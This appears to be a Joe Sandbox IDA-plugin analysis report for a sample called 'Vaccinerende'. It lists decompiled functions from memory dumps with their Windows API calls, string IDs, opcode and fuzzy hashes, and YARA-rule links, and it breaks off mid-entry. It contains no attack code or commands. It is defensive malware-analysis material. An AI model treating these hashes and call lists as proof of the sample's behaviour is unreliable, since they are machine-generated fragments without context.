                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@$free
                                            • String ID:
                                            • API String ID: 2241099983-0
                                            • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                            • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                            • malloc.MSVCRT ref: 004174BD
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                            • free.MSVCRT ref: 004174E4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                            • String ID:
                                            • API String ID: 4053608372-0
                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(?), ref: 0040D453
                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                            • memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                            • String ID:
                                            • API String ID: 1471605966-0
                                            • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                            • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                            Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcscpy.MSVCRT ref: 0044475F
                                            • wcscat.MSVCRT ref: 0044476E
                                            • wcscat.MSVCRT ref: 0044477F
                                            • wcscat.MSVCRT ref: 0044478E
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                            • String ID: \StringFileInfo\
                                            • API String ID: 102104167-2245444037
                                            • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                            • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                            Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                            Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemMetrics.USER32(00000000), ref: 00401990
                                            • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                            • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$PlacementWindow
                                            • String ID: AE
                                            • API String ID: 3548547718-685266089
                                            • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                            • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                            • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                            • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                            Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _memicmpwcslen
                                            • String ID: @@@@$History
                                            • API String ID: 1872909662-685208920
                                            • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                            • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004100FB
                                            • memset.MSVCRT ref: 00410112
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 00410141
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                            • String ID: </%s>
                                            • API String ID: 3400436232-259020660
                                            • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                            • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                            Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040E770
                                            • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSendmemset
                                            • String ID: AE$"
                                            • API String ID: 568519121-1989281832
                                            • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                            • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040D58D
                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ChildEnumTextWindowWindowsmemset
                                            • String ID: caption
                                            • API String ID: 1523050162-4135340389
                                            • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                            • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                            • String ID: MS Sans Serif
                                            • API String ID: 210187428-168460110
                                            • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                            • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                            Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClassName_wcsicmpmemset
                                            • String ID: edit
                                            • API String ID: 2747424523-2167791130
                                            • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                            • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                            Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID: SHAutoComplete$shlwapi.dll
                                            • API String ID: 3150196962-1506664499
                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                            Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp
                                            • String ID:
                                            • API String ID: 3384217055-0
                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                            Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                            • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                            Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                            • GetMenu.USER32(?), ref: 00410F8D
                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                            • String ID:
                                            • API String ID: 1889144086-0
                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                            Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                            • GetLastError.KERNEL32 ref: 0041810A
                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                            • String ID:
                                            • API String ID: 1661045500-0
                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
